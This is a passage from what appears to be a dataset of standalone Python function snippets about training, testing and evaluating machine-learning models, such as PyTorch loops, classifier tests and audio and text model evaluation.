torch.from_numpy(train_sigma)\n test_x = torch.from_numpy(test_x)\n test_y = torch.from_numpy(test_y)\n test_sigma = torch.from_numpy(test_sigma)\n\n # train_data_x, train_data_y, train_errors = get_batch(i)\n # loss_train = np.zeros(n_epochs)\n loss_test = np.zeros(n_epochs)\n loss_train_n = np.zeros(n_epochs)\n min_loss_test = 1e6 # big number\n n_stagnant = 0\n n_stagnant_max = 5\n for epoch in range(1, n_epochs + 1):\n model.train()\n output = model(train_x.float())\n loss_train = loss_fn(output, train_y, train_sigma)\n loss_train_n[epoch - 1] = loss_train.item()\n\n optimizer.zero_grad()\n loss_train.backward()\n optimizer.step()\n\n model.eval()\n with torch.no_grad():\n output_test = model(test_x.float())\n loss_test[epoch - 1] = loss_fn(output_test, test_y, test_sigma).item()\n if epoch % display_step == 0 and print_progress:\n print('Rep {}, Epoch {}, Training loss {}, Testing loss {}'.format(i, epoch,\n round(loss_train.item(), 3),\n round(loss_test[epoch - 1], 3)))\n if round(loss_test[epoch - 1], 3) >= round(loss_test[epoch - 1 - display_step], 3):\n n_stagnant += 1\n else:\n n_stagnant = 0\n if n_stagnant >= n_stagnant_max:\n if print_progress: print(\"detected stagnant training, breaking\")\n break\n if loss_test[epoch - 1] < min_loss_test:\n loss_test_reps[i] = loss_test[epoch - 1]\n min_loss_test = loss_test_reps[i]\n min_model = copy.deepcopy(model)\n # iets met copy.deepcopy(model)\n if epoch % saving_step == 0:\n torch.save(min_model.state_dict(), path_to_models + \"nn_rep\" + str(save_idx))\n with open(path_to_models + \"costs\" + \".txt\", \"w\") as text_file:\n text_file.write(str(min_loss_test))\n torch.save(min_model.state_dict(), path_to_models + \"nn_rep\" + str(save_idx))\n with open(path_to_models + \"costs\" + \".txt\", \"w\") as text_file:\n text_file.write(str(min_loss_test))\n # np.savetxt(path_to_models+ \"costs\" + str(bs_rep_num) + \".txt\", min_loss_test) # loss_test_reps[:epoch])", "def train_test_model_batch():\n train=learning.Train_kmer_clf()\n train.run()", "def test_model_runs(self):\n batch = _get_face_model_batch()\n pred_dist = self.model(batch, is_training=False)\n logits = pred_dist.logits\n with self.session() as sess:\n sess.run(tf.global_variables_initializer())\n vertices = np.random.rand(_BATCH_SIZE, _NUM_INPUT_VERTS, 3) - 0.5\n vertices_mask = np.ones([_BATCH_SIZE, _NUM_INPUT_VERTS])\n faces = np.random.randint(\n _NUM_INPUT_VERTS + 2, size=[_BATCH_SIZE, _NUM_INPUT_FACE_INDICES])\n sess.run(\n logits,\n {batch['vertices']: vertices,\n 
batch['vertices_mask']: vertices_mask,\n batch['faces']: faces}\n )", "def test_model(model, dataObj, index):\n\t(s,m,l), img = dataObj.__getitem__(index)\n\timg = img.float().unsqueeze(0)\n\t\n\tif next(model.parameters()).is_cuda:\n\t\toutput = model(img.cuda()) \n\telse:\n\t\toutput = model(img)\n\n\ts_pred,m_pred,l_pred = output[0].squeeze(0).cpu(), output[1].squeeze(0).cpu(), output[2].squeeze(0).cpu()\n\ts_pred = s_pred.detach().numpy()\n\tm_pred = m_pred.detach().numpy()\n\tl_pred = l_pred.detach().numpy()\n\n\timg = img.float().squeeze(0)\n\timg = img.permute(1,2,0)\n\n\tfor j in range(22):\n\t\tvisualize(img, s[j], m[j], l[j], s_pred[j], m_pred[j], l_pred[j])\n\t\tk = np.array(s[j])", "def test(model, dataloader, idx_to_char, device, config, with_analysis=False, plot_all=False, validation=True, with_iterations=False):\n\n model.eval()\n i = -1\n stat = \"validation\" if validation else \"test\"\n\n for i,x in enumerate(dataloader):\n line_imgs = x['line_imgs'].to(device)\n gt = x['gt'] # actual string ground truth\n\n if \"strokes\" in x and x[\"strokes\"] is not None:\n online = x[\"strokes\"].to(device)\n else:\n online = Variable(x['online'].to(device), requires_grad=False).view(1, -1, 1) if config[\n \"online_augmentation\"] and config[\"online_flag\"] else None\n\n\n loss, initial_err, pred_str = config[\"trainer\"].test(line_imgs, online, gt, validation=validation, with_iterations=with_iterations)\n\n if plot_all:\n imgs = x[\"line_imgs\"][:, 0, :, :, :] if config[\"n_warp_iterations\"] else x['line_imgs']\n plot_recognition_images(imgs, f\"{config['current_epoch']}_{i}_testing\", pred_str, config[\"image_test_dir\"], plot_count=4)\n\n # Only do one test\n if config[\"TESTING\"]:\n break\n\n if i >= 0: # if there was any test data, calculate the CER\n utils.reset_all_stats(config, keyword=stat)\n cer = config[\"stats\"][config[f\"designated_{stat}_cer\"]].y[-1] # most recent test CER\n\n if not plot_all:\n imgs = x[\"line_imgs\"][:, 0, :, :, :] if with_iterations else x['line_imgs']\n plot_recognition_images(imgs, f\"{config['current_epoch']}_testing\", pred_str, config[\"image_test_dir\"], plot_count=4)\n\n LOGGER.debug(config[\"stats\"])\n return cer\n else:\n log_print(f\"No {stat} data!\")\n return np.inf", "def test(self):\n self.model.eval()\n\n for step, sample in enumerate(self.test_loader):\n x, _, _ = sample\n x = x.to(self.device)\n\n y_pred = self.model.forward(x)\n loss = nn.MSELoss()(y_pred, x)\n self.test_losses.append(loss.item())\n\n if step % (max(8, len(self.test_loader)) // 8) == 0:\n out_img = torch.cat([x[0], torch.clamp(y_pred[0], 0, 1)], dim=2)\n self.sw.add_image(tag=f'sample_{step}', img_tensor=out_img, global_step=self.epoch)\n\n # log average loss on test set\n mean_test_loss = np.mean(self.test_losses)\n self.test_losses = []\n print(f'\\t● AVG Loss on TEST-set: {mean_test_loss:.6f} │ patience: ', end='')\n self.sw.add_scalar(tag='test_loss', scalar_value=mean_test_loss, global_step=self.epoch)\n\n # save best model and update training patience\n if self.best_test_loss is None or mean_test_loss < self.best_test_loss:\n self.best_test_loss = mean_test_loss\n self.patience = conf.FX_PATIENCE\n torch.save(self.model.state_dict(), self.log_path / 'best.pth')\n else:\n self.patience = self.patience - 1\n print(f'{self.patience}/{conf.FX_PATIENCE}')\n\n if self.patience == 0:\n self.show_completion_msg()", "def on_train_begin(self, logs):\n print(f\"Testing for {self.params['nb_episodes']} episodes ...\")", "def test_model(self, model, test_name):\n 
statistics = []\n stats = []\n for item in model.get_topics():\n statistics.append(item)\n statistics.append([\"Article topic\", \"Model topic index\"])\n self.connect_topic_id_to_topics(model)\n\n for article in self.testing_docs:\n analysis_res = model.analyse_text(article[1])\n if len(analysis_res) == 0:\n print(\"nothing found\")\n continue\n res = max(analysis_res, key=lambda item: item[1])\n statistics.append([article[0], res[0]])\n if res[0] not in self.topics_of_index:\n self.topics_of_index[res[0]] = [article[0]]\n self.topic_indexes[article[0]] = res[0]\n print(\"continuing\")\n continue\n\n stats.append(1 if article[0] in self.topics_of_index[res[0]] else 0)\n topic_number_index = self.topic_numbers.index(article[0])\n\n if article[0] in self.topics_of_index[res[0]]:\n guessed_topic_number_index = self.topic_numbers.index(article[0])\n else:\n guessed_topic_number_index = self.topic_numbers.index(self.topics_of_index[res[0]][0])\n self.confusion_matrix[guessed_topic_number_index][topic_number_index] += 1\n self.confusion_matrix_true[res[0]][topic_number_index] += 1\n #self.log_writer.add_log(\"Article with topic {} was assigned {} with {} certainty.\".format(article[0], \"correctly\" if res[0] == self.topic_positions[article[0]] else \"wrong\", res[1]))\n\n self.log_writer.write_2D_list(test_name, statistics)\n self.add_descriptions_to_confusion_matrix()\n self.log_writer.write_2D_list(test_name+\"\\\\confusion-matrix\", self.confusion_matrix)\n self.log_writer.write_2D_list(test_name+\"\\\\confusion-matrix-true\", self.confusion_matrix_true)\n return sum(stats)/len(stats)", "def train():\n import trace\n trace.train()", "def run_experiments() :\n #%%\n target_size=(32,32)\n g_specs = {\n \"batch_size\" : [ 30 , 60, 100 ],\n \"learning_rate\" : [ 0.0002, 0.0003, 0.0005 ],\n \"drop_out_rate\" : [ 0.2, 0.25, 0.3 ],\n \"rescale_mode\" : [ \"max_q\" , \"max\", \"\" ]\n }\n\n model_traits = MODEL_TRAITS[\"model2\"].copy()\n tt_obj = model_traits[\"trainer_tester_class\"]( model_traits )\n del model_traits[\"trainer_tester_class\"]\n\n cnt = 0\n for batchs, lrate, do_rate, resc_mode in product( g_specs[\"batch_size\"],\n g_specs[\"learning_rate\"],\n g_specs[\"drop_out_rate\"],\n g_specs[\"rescale_mode\"] ) :\n\n tt_obj.model_traits.update( {\"batch_size\" : batchs,\n \"learning_rate\" : lrate,\n \"rescale_mode\" : resc_mode,\n \"drop_out_rate\" : do_rate } )\n\n train_4d, train_gt = tu.make_4d_arrays( images_dir=\"images/train\",\n target_size=target_size )\n\n test_4d, test_gt = tu.make_4d_arrays( images_dir=\"images/test\",\n target_size=target_size )\n\n data = {\"train_4d\" : train_4d,\n \"test_4d\" : test_4d,\n \"train_y\" : train_gt,\n \"test_y\" : test_gt}\n\n valid_accu_log, train_accu_log = tt_obj.train( model_traits, data,\n logl=100 )\n idx_v = int(np.argmax( valid_accu_log))\n idx_t = int(np.argmax( train_accu_log))\n\n model_traits.update({\"valid_accu_log\" : valid_accu_log,\n \"train_accu_log\" : train_accu_log,\n \"best_valid\" : max(valid_accu_log),\n \"best_valid_at\" : idx_v,\n \"train_at_best_valid\" : train_accu_log[idx_v],\n \"best_train\" : max(train_accu_log),\n \"best_train_at\": idx_t })\n\n #print(cnt, pformat(model_traits) )\n print( \"%d : best_train = %.4f, best_valid = %.4f\" % \\\n (cnt, max(train_accu_log), max(valid_accu_log) ))\n\n with open( \"exp_results_%d.json\" % cnt,\n \"wt\" , encoding=\"utf8\" ) as f_out :\n print( json.dumps( model_traits ), file=f_out)\n\n\n cnt += 1\n #%%", "def test_model(epoch):\n model.eval()\n test_metrics = 
{\"loss\": [], \"acc\": []}\n timer = Timer()\n for batch_i, (X, y) in enumerate(test_dataloader):\n batch_i += 1\n image_sequences = Variable(X.to(device), requires_grad=False)\n labels = Variable(y, requires_grad=False).to(device)\n\n with torch.no_grad():\n # Reset LSTM hidden state\n model.lstm.reset_hidden_state()\n # Get sequence predictions\n predictions = model(image_sequences)\n\n # Compute metrics\n loss = criterion(predictions, labels)\n acc = (predictions.detach().argmax(1) == labels).cpu().numpy().mean()\n\n # Keep track of loss and accuracy\n test_metrics[\"loss\"].append(loss.item())\n test_metrics[\"acc\"].append(acc)\n\n # Determine approximate time left\n batches_done = batch_i - 1\n batches_left = len(test_dataloader) - batches_done\n time_left = datetime.timedelta(seconds=batches_left * timer.seconds())\n time_iter = round(timer.seconds(), 3)\n timer.reset()\n\n # Log test performance\n logger.info(\n f'Testing - [Epoch: {epoch}/{cfg.train.num_epochs}] [Batch: {batch_i}/{len(test_dataloader)}] [Loss: {np.mean(test_metrics[\"loss\"]):.3f}] [Acc: {np.mean(test_metrics[\"acc\"]):.3f}] [ETA: {time_left}] [Iter time: {time_iter}s/it]'\n )\n\n writer.add_scalar(\"test/loss\", np.mean(test_metrics[\"loss\"]), epoch)\n writer.add_scalar(\"test/acc\", np.mean(test_metrics[\"acc\"]), epoch)\n\n model.train()", "def eval(self):\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"Get test generator\"\"\"\r\n test_data = Dataset({'files': test, 'mode': 'eval', 'metadata_help': metadata_help})\r\n test_gen = data.DataLoader(test_data, batch_size=1,\r\n shuffle=True, collate_fn=test_data.collate_eval, drop_last=True)\r\n for batch_number, features in tqdm(enumerate(test_gen)):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n batch_metadata = features['metadata'][0]\r\n self.G = self.G.eval()\r\n\r\n outputs = self.G(spectrograms)\r\n outputs = np.squeeze(outputs.detach().cpu().numpy())\r\n phones = np.squeeze(phones.detach().cpu().numpy())\r\n phones = phones.astype(dtype=int)\r\n phones = [c2p[x] for x in phones]\r\n\r\n output_classes = np.argmax(outputs, axis=1)\r\n\r\n \"\"\"Decode the output predictions into a phone sequence\"\"\"\r\n # https://stackoverflow.com/questions/38065898/how-to-remove-the-adjacent-duplicate-value-in-a-numpy-array\r\n duplicates_eliminated = np.asarray([k for k, g in groupby(output_classes)])\r\n blanks_eliminated = duplicates_eliminated[duplicates_eliminated != 0]\r\n predicted_phones_ = [c2p[x] for x in blanks_eliminated]\r\n \"\"\"remove SOS and EOS\"\"\"\r\n predicted_phones = []\r\n for x in predicted_phones_:\r\n if x != 'SOS' and x != 'EOS':\r\n predicted_phones.append(x)\r\n\r\n data_to_save = {'speaker': batch_metadata['speaker'],\r\n 'word': batch_metadata['word'],\r\n 'true_phones': batch_metadata['phones'],\r\n 'predicted_phones': predicted_phones}\r\n dump_path = os.path.join(self.predict_dir, batch_metadata['utterance'] + '.pkl')\r\n joblib.dump(data_to_save, dump_path)", "def run_tests():\n source1 = TextModel('CS111 Syllabus')\n source1.add_file('CS111_Syllabus.txt')\n\n source2 = TextModel('AR Syllabus')\n 
source2.add_file('AR_Syllabus.txt')\n\n new1 = TextModel('WR120 Syllabus')\n new1.add_file('WR120_Syllabus.txt')\n new1.classify(source1, source2)\n \n new2 = TextModel('CS131 Syllabus')\n new2.add_file('CS131_Syllabus.txt')\n new2.classify(source1, source2)\n \n new3 = TextModel('My Paper 2 for WR120')\n new3.add_file('WR_Paper_2.txt')\n new3.classify(source1, source2)\n \n new4 = TextModel('CS111 PS9PR0')\n new4.add_file('ps9pr0.txt')\n new4.classify(source1, source2)", "def Analyze_Model(model_list,test_types):\n N_neurons = [20,40,60,80,100,120]\n num_test = len(test_types)\n\n\n #### VISUALIZING FUNCTIONS ####", "def main():\n\n # Load the data and scale\n x_train = np.load(\"../data/audio/ESC-10/esc10_raw_train_audio.npy\")[:,:,0]\n y_train = np.load(\"../data/audio/ESC-10/esc10_raw_train_labels.npy\")\n x_test = np.load(\"../data/audio/ESC-10/esc10_raw_test_audio.npy\")[:,:,0]\n y_test = np.load(\"../data/audio/ESC-10/esc10_raw_test_labels.npy\")\n\n x_train = (x_train.astype('float32') + 32768) / 65536\n x_test = (x_test.astype('float32') + 32768) / 65536\n\n # Train and test the models\n train(x_train, y_train, x_test, y_test)", "def training_controller(self, silent=True, plot=False):\n no_labels = len(self.dataset['label'].unique())\n active_models = self.active_models\n active_models = self.ignore_suboptimal_combinations(active_models)\n models_to_run = {model: ExtendedPipeline(model,self.vectorizer,self.transform,self.stemmer,apply_stemming=False)\n for model in active_models}\n with self.database:\n cur = self.database.cursor()\n\n # if there is no data for the current training settings, create an entry in the table\n for model in active_models:\n uid = self.uid_base+'_'+model\n try:\n cur.execute(\"INSERT INTO model_performance_results VALUES (?,?,?,?,?,0,0,?)\",\n (uid,self.stemmer,self.vectorizer,self.transform,model,no_labels))\n self.best_score_ledger[model] = [0, 0]\n except sqlite3.IntegrityError:\n scores_to_beat = cur.execute(\"\"\"SELECT f1_score,accuracy from model_performance_results\n WHERE unique_id = ? \"\"\",\n (self.uid_base+'_'+model,))\n self.best_score_ledger[model] = [_ for _ in list(scores_to_beat)[0]]\n\n self.get_best_model_configs()\n results = defaultdict(dict)\n\n # run n iterations for each model in this configuration\n for _ in tqdm.tqdm(range(self.iterations)):\n if not silent:\n print(f'\\nRound {_}:\\nStemmer : {self.stemmer}\\nTransformer : {self.transform}\\n')\n self.shuffle_dataset()\n for name,model in models_to_run.items():\n res = self.train_models(model, silent=silent)\n scre = res[2]\n if plot and scre > results[name]['score']:\n results[name] = res\n\n # updating model performance results table\n for model in active_models:\n uid = self.uid_base + '_' + model\n with self.database:\n cur = self.database.cursor()\n cur.execute(\"UPDATE model_performance_results SET accuracy = ?,f1_score = ? 
WHERE unique_id = ?\",\n (self.best_score_ledger[model][0],self.best_score_ledger[model][1],uid))", "def classic_model_testing():\n dataset_path = \"/home/kateryna/Documents\"\n X_train, X_test, y_train, y_test = generate_embeddings_memory(dataset_path, classes=['normal', 'glare_small'])\n contam = 0.08\n models = [XGBOD(), OCSVM(contamination=contam), IForest(contamination=contam, n_estimators=150), XGBOD(learning_rate=0.01, n_estimators=150),\n COPOD(contamination=contam)]\n for model in models:\n model_name = model.__str__().split('(')[0]\n clf = model\n clf.fit(X_train, y_train)\n\n y_train_pred = clf.labels_\n y_train_scores = clf.decision_scores_\n\n # get the prediction on the test data\n # 0 stands for inliers and 1 for outliers.\n y_test_pred = clf.predict(X_test)\n y_test_scores = clf.decision_function(X_test)\n # y_probabilities = clf.predict_proba(X_test)\n print(\"\\nOn Training Data:\")\n evaluate_print(model_name, y_train, y_train_scores)\n print(\"\\nOn Test Data:\")\n evaluate_print(model_name, y_test, y_test_scores)\n print('roc auc', roc_auc_score(y_test, y_test_scores))\n\n conf_mtx_test = confusion_matrix(y_test, y_test_pred, labels=[0, 1])\n print(conf_mtx_test)\n conf_mtx_train = confusion_matrix(y_train, y_train_pred, labels=[0, 1])\n print(conf_mtx_train)\n print('~~~')", "def do_system_testing(dataset, result_path, feature_path, model_path, feature_params, detector_params,\n dataset_evaluation_mode='folds', classifier_method='gmm', overwrite=False):\n\n if classifier_method != 'gmm':\n raise ValueError(\"Unknown classifier method [\"+classifier_method+\"]\")\n\n # Check that target path exists, create if not\n check_path(result_path)\n\n for fold in dataset.folds(mode=dataset_evaluation_mode):\n for scene_id, scene_label in enumerate(dataset.scene_labels):\n current_result_file = get_result_filename(fold=fold, scene_label=scene_label, path=result_path)\n\n if not os.path.isfile(current_result_file) or overwrite:\n results = []\n\n # Load class model container\n model_filename = get_model_filename(fold=fold, scene_label=scene_label, path=model_path)\n if os.path.isfile(model_filename):\n model_container = load_data(model_filename)\n else:\n raise IOError(\"Model file not found [%s]\" % model_filename)\n\n file_count = len(dataset.test(fold, scene_label=scene_label))\n for file_id, item in enumerate(dataset.test(fold=fold, scene_label=scene_label)):\n progress(title_text='Testing',\n fold=fold,\n percentage=(float(file_id) / file_count),\n note=scene_label+\" / \"+os.path.split(item['file'])[1])\n\n # Load features\n feature_filename = get_feature_filename(audio_file=item['file'], path=feature_path)\n\n if os.path.isfile(feature_filename):\n feature_data = load_data(feature_filename)['feat']\n else:\n # Load audio\n if os.path.isfile(dataset.relative_to_absolute_path(item['file'])):\n y, fs = load_audio(filename=item['file'], mono=True, fs=feature_params['fs'])\n else:\n raise IOError(\"Audio file not found [%s]\" % item['file'])\n\n # Extract features\n feature_data = feature_extraction(y=y,\n fs=fs,\n include_mfcc0=feature_params['include_mfcc0'],\n include_delta=feature_params['include_delta'],\n include_acceleration=feature_params['include_acceleration'],\n mfcc_params=feature_params['mfcc'],\n delta_params=feature_params['mfcc_delta'],\n acceleration_params=feature_params['mfcc_acceleration'],\n statistics=False)['feat']\n\n # Normalize features\n feature_data = model_container['normalizer'].normalize(feature_data)\n\n current_results = 
event_detection(feature_data=feature_data,\n model_container=model_container,\n hop_length_seconds=feature_params['hop_length_seconds'],\n smoothing_window_length_seconds=detector_params['smoothing_window_length'],\n decision_threshold=detector_params['decision_threshold'],\n minimum_event_length=detector_params['minimum_event_length'],\n minimum_event_gap=detector_params['minimum_event_gap'])\n\n # Store the result\n for event in current_results:\n results.append((dataset.absolute_to_relative(item['file']), event[0], event[1], event[2] ))\n\n # Save testing results\n with open(current_result_file, 'wt') as f:\n writer = csv.writer(f, delimiter='\\t')\n for result_item in results:\n writer.writerow(result_item)", "def learn(self):\n metrics_hist = dict()\n max_runs = 3\n for run in range(max_runs):\n all_indices, initial_indices = self._init_al_dataset()\n\n metrics_hist[str(run)] = dict()\n\n current_indices = list(initial_indices)\n \n for split in self.data_splits_frac:\n print(f'\\nRUN {run} - SPLIT - {split*100:0.0f}%')\n\n # Initialise models\n self._init_models(mode='svaal')\n\n # Do some label stuff\n unlabelled_indices = np.setdiff1d(list(all_indices), current_indices)\n unlabelled_sampler = data.sampler.SubsetRandomSampler(unlabelled_indices)\n unlabelled_dataloader = data.DataLoader(self.datasets['train'],\n sampler=unlabelled_sampler,\n batch_size=64,\n drop_last=False)\n\n print(f'Labelled: {len(current_indices)} Unlabelled: {len(unlabelled_indices)} Total: {len(all_indices)}')\n\n # TODO: Make the SVAAL allow 100% labelled and 0% unlabelled to pass through it. Breaking out of loop for now when data hits 100% labelled.\n if len(unlabelled_indices) == 0:\n break\n\n metrics, svae, discriminator = self.train(dataloader_l=self.labelled_dataloader,\n dataloader_u=unlabelled_dataloader,\n dataloader_v=self.val_dataloader,\n dataloader_t=self.test_dataloader,\n mode='svaal') \n print(f'Test Eval.: F1 Scores - Macro {metrics[0]*100:0.2f}% Micro {metrics[1]*100:0.2f}%') \n \n # Record performance at each split\n metrics_hist[str(run)][str(split)] = metrics\n\n \n sampled_indices = self.sample_adversarial(svae, discriminator, unlabelled_dataloader, indices=unlabelled_indices, cuda=True) # TODO: review usage of indices arg\n current_indices = list(current_indices) + list(sampled_indices)\n sampler = data.sampler.SubsetRandomSampler(current_indices)\n self.labelled_dataloader = data.DataLoader(self.datasets['train'], sampler=sampler, batch_size=self.batch_size, drop_last=True)\n \n # write results to disk\n with open('results.json', 'w') as fj:\n json.dump(metrics_hist, fj, indent=4)", "def model_test(epo, natural):\n\tmodel.eval()\n\twith torch.no_grad():\n\t\tn = batch_size\n\n\t\tif natural:\n\t\t\tloader = nat_test_loader\n\t\t\tprefix = \"nat\"\n\t\telse:\n\t\t\tloader = syn_test_loader\n\t\t\tprefix = \"syn\"\n\n\t\tlog_cor_file = open(directory + \"/logs/test_\" + prefix + \"_cor_log.txt\", \"a\") # Correct\n\t\tlog_mae_file = open(directory + \"/logs/test_\" + prefix + \"_mae_log.txt\", \"a\") # MAE\n\t\tlog_dev_file = open(directory + \"/logs/test_\" + prefix + \"_dev_log.txt\", \"a\") # DEV\n\t\tlog_sam_file = open(directory + \"/logs/test_\" + prefix + \"_sam_log.txt\", \"a\") # Sample\n\n\t\tccs = []\n\t\tlabls = []\n\t\tnum_unlabeled = 0\n\t\tfor batch_idx, (data, labels) in enumerate(loader):\n\t\t\tdata = data.cuda()\n\t\t\tlabels = labels.float().cuda()\n\n\t\t\tmodel.mode = 'natural' if natural else 'synth'\n\t\t\trecon_batch, mu, logvar, cc = 
model(data)\n\n\t\t\tcc[labels == 0] = 0 # Sets the counted cells to 0 for unlabeled data, so that regressor_loss=0\n\t\t\tnum_unlabeled += (labels == 0).sum()\n\t\t\t_, _, _ = loss_function(recon_batch, data, mu, logvar, cc, labels, natural)\n\n\t\t\tccs.append(cc.cpu().detach().numpy())\n\t\t\tlabls.append(labels.cpu().detach().numpy())\n\n\t\t\tif batch_idx == 0 and epo % 1000 == 0:\n\t\t\t\t# Save test sample\n\t\t\t\tcomparison = torch.cat([data[:n], recon_batch.view(batch_size, 1, img_size, img_size)[:n]])\n\t\t\t\tsave_image(comparison.cpu(), directory + \"/\" + prefix + \"_\" + str(epo) + \".png\", nrow=n)\n\n\t\t\t\t# Save switch sample\n\t\t\t\tmodel.mode = 'synth' if natural else 'natural'\n\t\t\t\trecon_batch, _, _, _ = model(data)\n\t\t\t\tcomparison = torch.cat([data[:n], recon_batch.view(batch_size, 1, img_size, img_size)[:n]])\n\t\t\t\tsave_image(comparison.cpu(), directory + \"/switch_\" + prefix + \"_\" + str(epo) + \".png\", nrow=n)\n\n\t\tpreds = np.concatenate(ccs, axis=None) # Elementwise round of cellcounts\n\t\tlbls = np.concatenate(labls, axis=None) # Elementswise round of labels\n\n\t\tlog_sam_file.write(str(np.round(preds, 2)) + \"\\n\" + str(lbls) + \"\\n\")\n\t\tpreds = np.around(preds)\n\t\t#lbls = np.around(lbls)\n\n\t\tcorrect = np.sum(preds == lbls) # Count elementwise equality of predictions and labels\n\t\tlen_set = len(loader.dataset)\n\t\tcorrect -= num_unlabeled # Remove zero_indices from numerator\n\t\tcorrect = float(correct) / float(len_set - num_unlabeled) # Remove zero_indices from denominator\n\n\t\tdist_sum = np.sum(np.abs(np.subtract(preds, lbls))) # Elementwise addition of dist between preds and lbls\n\t\tMAE = dist_sum / float(len_set - num_unlabeled)\n\n\t\tlen_labeled = float(len_set - num_unlabeled)\n\t\tdev = np.ones(len_set) - np.divide(preds, lbls) # Deviation contains NaNs because syn data has lbl=0\n\t\tavg_dev = np.sum(np.abs(np.where(np.isnan(dev), 0, dev))) / len_labeled # Take the avg only of those deviations that weren't NaN\n\n\t\tlog_cor_file.write(str(correct)+\"\\n\")\n\t\tlog_mae_file.write(str(MAE)+\"\\n\")\n\t\tlog_dev_file.write(str(avg_dev)+\"\\n\")\n\n\t\t#logfile.write(str(correct) + \" correct, MAE: \" + str(MAE) + \", DEV: \" + str(avg_dev) + \" in \" + prefix + \" set in epoch \" + str(epoch) + \"\\n\\n\")\n\t\tlog_cor_file.close()\n\t\tlog_mae_file.close()\n\t\tlog_dev_file.close()\n\t\tlog_sam_file.close()\n\n\t\tglobal distance_sum\n\t\tdistance_sum = dist_sum\n\t\treturn correct, MAE", "def test_all(log_file_in_tmpdir, tmp_path):\n elements = [\n Component('macro', 'macro_impl'),\n Component('micro', 'micro_impl', [NUM_MICROS])]\n\n conduits = [\n Conduit('macro.out', 'micro.in'),\n Conduit('micro.out', 'macro.in')]\n\n model = Model('test_model', elements, conduits)\n settings = Settings(OrderedDict([\n ('test1', 13),\n ('test2', 13.3),\n ('test3', 'testing'),\n ('test4', True),\n ('test5', [2.3, 5.6]),\n ('test6', [[1.0, 2.0], [3.0, 1.0]])]))\n\n configuration = Configuration(model, settings)\n\n implementations = {'macro_impl': macro, 'micro_impl': micro}\n run_simulation(configuration, implementations)\n\n check_profile_output(tmp_path)", "def test_svd_smoothing_with_model(self):\n\n\t\t\n\t\t# 819 =~ 4096*0.2\n\t\tself.watcher.SVDSmoothing(model=self.model, layers=[self.fc2_layer])\n\t\tesd = self.watcher.get_ESD(layer=self.fc2_layer) \n\t\tnum_comps = len(esd[esd>10**-10])\n\t\tself.assertEqual(num_comps, 819)", "def run_tests():\n source1 = TextModel('prep')\n source1.add_file('source_model_1.txt')\n \n 
source2 = TextModel('athletes')\n source2.add_file('source_model_2.txt')\n\n new1 = TextModel('my_writing')\n new1.add_file('my_writing.txt')\n new1.classify(source1, source2)\n\n # Add code for three other new models below.", "def run_model(project=None, model=None, raw=None, dyr=None, xls=None, path=None, server='tcp://127.0.0.1:5678'):\n ret = 0\n if (not project) or (not model):\n logging.error('RT-LAB project or model undefined.')\n sys.exit(-1)\n if (not raw) and (not xls):\n logging.error('PSS/E raw file or ePHASORsim Excel file undefined.')\n sys.exit(-1)\n if not dyr:\n logging.debug('PSS/E dyr file not specified')\n\n sim = SimControl(project, model, path)\n\n simulink = os.path.join(path,project, 'simulink')\n models = os.path.join(path,project, 'models')\n if not os.path.isdir(simulink):\n logging.error('No <{}> directory found.'.format(simulink))\n if not os.path.isdir(models):\n logging.error('No <{}> directory found.'.format(models))\n sys.exit(1)\n else:\n logging.info('Using <{}> directory'.format(models))\n modelPath = models\n else:\n logging.info('Using <{}> directory'.format(simulink))\n modelPath = simulink\n\n\n sim_data = LTBSetup(raw=raw, dyr=dyr, xls=xls, path=modelPath, model=model, simObject=sim)\n\n streaming = Streaming(name='sim', server=server, ltb_data=sim_data)\n\n sim.open()\n sim.load()\n\n sim_data.get_sysparam()\n sim_data.get_varheader_idxvgs()\n sim.set_settings(sim_data.Settings)\n # sim_data.Idxvgs['Line'].update(sim.add_branch_power_to_idxvgs())\n # sim_data.Varheader.extend(sim.add_vars_varheader(sim_data.Idxvgs['Line']))\n # sim_data.Idxvgs['Bus'].update(sim.add_bus_power_to_idxvgs())\n # sim_data.Varheader.extend(sim.add_vars_varheader(sim_data.Idxvgs['Bus']))\n streaming.send_init()\n logging.debug('Varheader, SysParam and Idxvgs sent.')\n sleep(0.5)\n\n sim.start()\n\n streaming.run()", "def analysis():\n global prediction\n\n json_path = os.path.join(basedir, 'static', 'data', 'tmp_json')\n # csv_path = os.path.join(basedir, 'static', 'data', 'csv')\n # if not os.path.exists(csv_path):\n # os.mkdir(csv_path)\n\n if os.name == 'nt':\n audio_file = Path(os.path.join(json_path, 'audio_data.shlf.dir'))\n video_file = Path(os.path.join(json_path, 'facial_data.shlf.dir'))\n else:\n audio_file = Path(os.path.join(json_path, 'audio_data.shlf'))\n video_file = Path(os.path.join(json_path, 'facial_data.shlf'))\n\n # Files exists\n if audio_file.is_file() and video_file.is_file():\n with shelve.open(os.path.join(json_path, 'facial_data.shlf')) as shelf:\n emotion_data = shelf['emotion_data']\n microexpression_data = shelf['micro_expression_data']\n blink_data = shelf['blink_data']\n\n with shelve.open(os.path.join(json_path, 'audio_data.shlf')) as shelf:\n mean_energy = shelf['mean_energy']\n max_pitch_amp = shelf['max_pitch_amp']\n vowel_duration = shelf['vowel_duration']\n pitch_contour = shelf['pitch_contour']\n\n else:\n emotion_data = None\n microexpression_data = None\n blink_data = None\n mean_energy = None\n max_pitch_amp = None\n vowel_duration = None\n pitch_contour = None\n\n # Training Files (choose one)\n # soc_file = os.path.join(basedir, 'static', 'data', 'train_files', 'first_soc.txt')\n # niko_file = os.path.join(basedir, 'static', 'data', 'train_files', 'first_niko.txt')\n # vero_file = os.path.join(basedir, 'static', 'data', 'train_files', 'first_vero.txt')\n\n # txt_file = soc_file\n\n # train_data = []\n\n # for cases where one parameter has more elements\n # for i in range(min(len(blink_data), len(microexpression_data), 
